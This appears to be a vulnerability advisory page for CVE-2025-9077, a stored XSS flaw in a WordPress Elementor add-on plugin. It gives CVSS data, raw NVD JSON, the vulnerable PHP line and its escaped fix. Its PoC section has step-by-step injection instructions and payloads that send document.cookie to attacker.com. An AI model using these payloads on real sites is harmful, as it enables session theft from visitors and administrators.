Security Vulnerability Report
中文
CVE-2025-9077 CVSS 6.4 MEDIUM

CVE-2025-9077

Published: 2025-10-03 12:15:46
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Ultra Addons Lite for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Animated Text' field of the Typeout Widget in version 1.1.9 and below due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Ultra Addons Lite for Elementor <= 1.1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2025-9077: Stored XSS in Ultra Addons Lite for Elementor Affected: Typeout Widget -> Animated Text field Required: Contributor-level WordPress account --> <!-- Step 1: Login as Contributor or higher --> <!-- Step 2: Create/Edit a page using Elementor --> <!-- Step 3: Add the Typeout Widget to the page --> <!-- Step 4: Inject malicious payload into the 'Animated Text' field --> <!-- Payload examples for the Animated Text field: --> <script>alert('XSS-CVE-2025-9077')</script> <script>document.location='https://attacker.com/steal?c='+document.cookie</script> <img src=x onerror="fetch('https://attacker.com/log',{method:'POST',body:document.cookie})"> <!-- Step 5: Publish/Update the page --> <!-- Step 6: When any user (including admin) visits the page, the script executes --> <!-- Vulnerable code location (typeout.php line ~276): --> <?php // Vulnerable pattern - no sanitization or escaping: echo '<span class="ut-elementor-typeout-text">' . $settings['animated_text'] . '</span>'; ?> <!-- Fixed code (v1.2.0) should use proper escaping: --> <?php echo '<span class="ut-elementor-typeout-text">' . esc_html( $settings['animated_text'] ) . '</span>'; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9077", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:45.517", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Ultra Addons Lite for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Animated Text' field of the Typeout Widget in version 1.1.9 and below due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ut-elementor-addons-lite/tags/1.1.9/elements/typeout.php#L276", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ut-elementor-addons-lite/tags/1.2.0/elements/typeout.php#L276", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/513f116b-84d3-4848-b608-f2a2ee57a9a2?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.